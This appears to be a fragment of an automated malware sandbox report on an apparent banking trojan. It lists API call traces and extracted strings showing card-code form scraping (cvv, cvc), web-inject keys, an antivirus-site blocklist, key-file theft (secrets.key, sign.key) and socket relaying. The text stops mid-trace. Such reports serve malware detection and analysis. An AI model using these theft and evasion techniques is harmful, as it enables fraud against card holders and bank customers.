                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02BFF5A0), ref: 02BBDA6A
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDA83
                                                                                                                                                                                                              • Part of subcall function 02BB9020: SetThreadDesktop.USER32(?,76F8F590,76F816B0,?), ref: 02BB902F
                                                                                                                                                                                                              • Part of subcall function 02BB9020: GetDC.USER32(00000000), ref: 02BB9037
                                                                                                                                                                                                              • Part of subcall function 02BB9020: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02BB9048
                                                                                                                                                                                                              • Part of subcall function 02BB9020: GetDeviceCaps.GDI32(00000000,00000008), ref: 02BB9059
                                                                                                                                                                                                              • Part of subcall function 02BB9020: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02BB9070
                                                                                                                                                                                                              • Part of subcall function 02BB9020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02BB90B2
                                                                                                                                                                                                              • Part of subcall function 02BB9020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02BB90C2
                                                                                                                                                                                                              • Part of subcall function 02BB9020: DeleteObject.GDI32(00000000), ref: 02BB90C5
                                                                                                                                                                                                              • Part of subcall function 02BB9020: ReleaseDC.USER32(00000000,00000000), ref: 02BB90CE
                                                                                                                                                                                                              • Part of subcall function 02BB9020: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB9129
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02BFF54C), ref: 02BBDAB0
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDAC3
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,02BFF670), ref: 02BBDAE1
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BBDAFF
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 02BBDB20
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(02BFF670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BBDB3D
                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 02BBDB47
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BBDB61
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,02BFF630), ref: 02BBDB79
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BBDB97
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000000,?), ref: 02BBDBB8
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(02BFF630,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BBDBD5
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 02BBDBDF
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BBDBFD
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BBDC10
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02BBDC23
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,02BFF5DC), ref: 02BBDC39
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                              • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                              • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                              • Part of subcall function 02BD5930: FindCloseChangeNotification.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$Security$Descriptor$wsprintf$EventFile$FreeMutexThreadToken$BitsCapsConvertCurrentDeviceHeapInfoLocalMappingNamedOpenProcessSaclStringView$AdjustBitmapChangeCloseCompatibleComputerCountDeleteDesktopErrorFindLastLookupNameNotificationObjectPrivilegePrivilegesReleaseTickValuelstrlen
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 3490689938-820036962
                                                                                                                                                                                                            • Opcode ID: 42ac57b92071214429b01ef6dbb1e150c22055e3cff6698e8fa3ff40fe6745af
                                                                                                                                                                                                            • Instruction ID: df667d3627288c3f3d38006f7ae830320e32ece895f1b270dee6159822760511
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42ac57b92071214429b01ef6dbb1e150c22055e3cff6698e8fa3ff40fe6745af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F517B71FC0306BAF7719BA49C86FAA77A8AF44B41F104585B701EB2C0DBF4A5108F65
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,76F8F380,00000000,00000001,00000000,?,?,?,02BC8A44,?,?,?,?,?), ref: 02BCE433
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE441
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE44D
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE45B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE467
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02BC8A44,?,?,?,?,?,?), ref: 02BCE479
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BCE48F
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BCE4A2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02BCE50B
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02BCE512
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCE522
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCE580,00000000,00000000,00000000), ref: 02BCE548
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCE560
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCE571
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                            • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                            • API String ID: 1632825432-2817208116
                                                                                                                                                                                                            • Opcode ID: 2d47b643c78aeb60bf16da58e376c2c21393b2149405fda625538a2135f564df
                                                                                                                                                                                                            • Instruction ID: 6c05d480452d44691725d6c1e443c69198a0d7adebbaa025fa44fb1d99e5c30a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d47b643c78aeb60bf16da58e376c2c21393b2149405fda625538a2135f564df
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA416831A40B11AFE3220A386C59FAF279DCF45745F7842D8FA84E7252EB61D61983A4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02BC9B39
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC9B42
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02BC9B4C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC9B4F
                                                                                                                                                                                                            • recv.WS2_32(?,?,?,00000000), ref: 02BC9B75
                                                                                                                                                                                                            • send.WS2_32(?,02BF9E4C,00000002,00000000), ref: 02BC9BCC
                                                                                                                                                                                                            • send.WS2_32(?,02BFE1CC,00000002,00000000), ref: 02BC9BF2
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000004,00000000), ref: 02BC9C18
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000001,00000000), ref: 02BC9C92
                                                                                                                                                                                                            • gethostbyname.WS2_32(00000005), ref: 02BC9CC7
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000002,00000000), ref: 02BC9D0D
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000004,00000000), ref: 02BC9D24
                                                                                                                                                                                                            • inet_ntoa.WS2_32(?), ref: 02BC9D37
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000002,00000000), ref: 02BC9D47
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02BC9D5A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000005), ref: 02BC9D67
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC9D6E
                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 02BC9D7A
                                                                                                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 02BC9D9C
                                                                                                                                                                                                            • send.WS2_32(?,?,0000000A,00000000), ref: 02BC9DB6
                                                                                                                                                                                                            • send.WS2_32(?,?,0000000A,00000000), ref: 02BC9DD0
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC9970,?,00000000,00000000), ref: 02BC9DEA
                                                                                                                                                                                                            • recv.WS2_32(?,?,?,00000000), ref: 02BC9CBC
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: shutdown.WS2_32(?,00000001), ref: 02BC990B
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: shutdown.WS2_32(02BC99EC,00000001), ref: 02BC9910
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: recv.WS2_32(02BC99EC,?,00000400,00000000), ref: 02BC992F
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: recv.WS2_32(?,?,00000400,00000000), ref: 02BC9945
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: closesocket.WS2_32(?), ref: 02BC9959
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: closesocket.WS2_32(02BC99EC), ref: 02BC995C
                                                                                                                                                                                                              • Part of subcall function 02BC98F0: ExitThread.KERNEL32 ref: 02BC9960
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC9DFC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: recv$Heap$send$Process$AllocThreadclosesocketshutdown$CloseCreateExitFreeHandleconnectgethostbynamehtonsinet_ntoasocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 699211285-0
                                                                                                                                                                                                            • Opcode ID: 464f55130aef19571fea108311acb62740dd3e672f40c0e3442866846667ad97
                                                                                                                                                                                                            • Instruction ID: ea03bcc03c383b92d390e7d23d3935b92d2247291f021160b5509921a45309a4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 464f55130aef19571fea108311acb62740dd3e672f40c0e3442866846667ad97
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A891AEB1648740BEF320EB748C85F7BBB99EB84740F64594DF682A7182D7B4E444CB62
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,avast.com,?,?,02BB62EC), ref: 02BB61CB
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,kaspersky,?,?,02BB62EC), ref: 02BB61DB
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,drweb,?,?,02BB62EC), ref: 02BB61E7
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,eset.com,?,?,02BB62EC), ref: 02BB61F3
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,antivir,?,?,02BB62EC), ref: 02BB61FF
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,avira,?,?,02BB62EC), ref: 02BB620B
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,virustotal,?,?,02BB62EC), ref: 02BB6217
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,virusinfo,?,?,02BB62EC), ref: 02BB6223
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,z-oleg.com,?,?,02BB62EC), ref: 02BB622F
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,trendsecure,?,?,02BB62EC), ref: 02BB623B
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,anti-malware,?,?,02BB62EC), ref: 02BB6247
                                                                                                                                                                                                            • StrStrIW.SHLWAPI(?,.comodo.com,?,?,02BB62EC), ref: 02BB6253
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                            • API String ID: 0-375433535
                                                                                                                                                                                                            • Opcode ID: e68933dc23c084e55b969b404f6e66dc13f96caa5fa700494cd1ac5e9e524ca7
                                                                                                                                                                                                            • Instruction ID: c4686c5c700d1ec9a7c85216a8cb99de67eca427b8818a6312c2fdf93ce7a5d9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e68933dc23c084e55b969b404f6e66dc13f96caa5fa700494cd1ac5e9e524ca7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62017DA6B8671624767231298C61FEF478C9FC1E8A78206E4FB45F1014F7C5DA070979
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,avast.com,?,?,02BB62AC), ref: 02BB611B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kaspersky,?,?,02BB62AC), ref: 02BB612B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,drweb,?,?,02BB62AC), ref: 02BB6137
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,eset.com,?,?,02BB62AC), ref: 02BB6143
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,antivir,?,?,02BB62AC), ref: 02BB614F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,avira,?,?,02BB62AC), ref: 02BB615B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,virustotal,?,?,02BB62AC), ref: 02BB6167
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,virusinfo,?,?,02BB62AC), ref: 02BB6173
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,z-oleg.com,?,?,02BB62AC), ref: 02BB617F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,trendsecure,?,?,02BB62AC), ref: 02BB618B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,anti-malware,?,?,02BB62AC), ref: 02BB6197
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,.comodo.com,?,?,02BB62AC), ref: 02BB61A3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                            • API String ID: 0-375433535
                                                                                                                                                                                                            • Opcode ID: 803085f5ddb265df9db2d658898b7913375dab3d80312ba7c9f755e38dd8dbfb
                                                                                                                                                                                                            • Instruction ID: 5cba8f984ca5aec2e6624b432ec2a80a0eca3673a1ce96b7eed7571117d58075
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 803085f5ddb265df9db2d658898b7913375dab3d80312ba7c9f755e38dd8dbfb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C101AD72BC2756283E7371398C91FFF474C8F89C8838156A0F621E101AF7C6D94B4965
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02BB148C,00000000,?), ref: 02BB101B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013,76F8F570,?,02BB148C,00000000,?), ref: 02BB103E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB1045
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB1055
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,76F8F570,?,02BB148C,00000000,?), ref: 02BB1073
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02BB148C,00000000,?), ref: 02BB1093
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD0810,00000000,00000000,00000000), ref: 02BB10B9
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,\secrets.key,?,02BB148C,00000000,?), ref: 02BB10D5
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD20D0,00000000,00000000,00000000), ref: 02BB10E5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,sign.key,?,02BB148C,00000000,?), ref: 02BB10FD
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD2BB0,00000000,00000000,00000000), ref: 02BB1116
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,02BB148C,00000000,?), ref: 02BB112A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB113B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02BB148C,00000000,?), ref: 02BB1150
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB1153
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02BB148C,00000000,?), ref: 02BB115F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB1162
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                            • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                            • API String ID: 3254303593-2345338882
                                                                                                                                                                                                            • Opcode ID: 94ac94a65b1485060b24576d2751fb54792aae1824d4a1c86f8f95d176430f02
                                                                                                                                                                                                            • Instruction ID: c8028fd78d668e3ac2aef66687c1a022bbf286838169bf84563a2e8ecb02e934
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94ac94a65b1485060b24576d2751fb54792aae1824d4a1c86f8f95d176430f02
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D41F4315512517AA7326A6A9C9CDFF7F3CEFC6FA0B904698FA19A3040E7A1C441C7B0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,?,76A8DB30), ref: 00403060
                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                              • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                              • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                              • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                            • String ID: cmd.exe
                                                                                                                                                                                                            • API String ID: 2839743307-723907552
                                                                                                                                                                                                            • Opcode ID: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                            • Instruction ID: bf3241a60ff26ee6c0642b95ea0adfafd6aded52afbf6c2e6df27db904542273
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02BFFB20,00000000,00000000,00000000,?,02BC1A39), ref: 02BC1330
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000020,?,02BC1A39), ref: 02BC1398
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02BC1A39), ref: 02BC139F
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC141F
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC1439
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC1453
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC146D
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC1497
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000020), ref: 02BC14B4
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC14BB
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC15E4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC161C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC161F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC162C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC162F
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB20,?,02BC1A39), ref: 02BC163A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                            • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                            • API String ID: 2387113551-2328515424
                                                                                                                                                                                                            • Opcode ID: 25ad26229560573ab04331fa448130a095fa6d6a71a835bc903d8b6be9739cdd
                                                                                                                                                                                                            • Instruction ID: 175eff3abbedf8bcc87e91a6b51b60f50b498e2faab170de4acc5268710be294
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25ad26229560573ab04331fa448130a095fa6d6a71a835bc903d8b6be9739cdd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EA1CE71A047019FDB21CF3884987A67FE1EF45348F2885EDD98A9B643EB71D609CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BBDF80: GetDesktopWindow.USER32 ref: 02BBDF8E
                                                                                                                                                                                                              • Part of subcall function 02BBDF80: RealChildWindowFromPoint.USER32(00000000,?,02BBE016,?,02BBA857,?,76F930D0,?), ref: 02BBDF95
                                                                                                                                                                                                              • Part of subcall function 02BBDF80: IsWindowVisible.USER32(00000000), ref: 02BBDFC1
                                                                                                                                                                                                              • Part of subcall function 02BBDF80: GetParent.USER32(00000000), ref: 02BBDFC8
                                                                                                                                                                                                              • Part of subcall function 02BBDF80: GetWindowLongA.USER32(00000000,000000EC), ref: 02BBDFD3
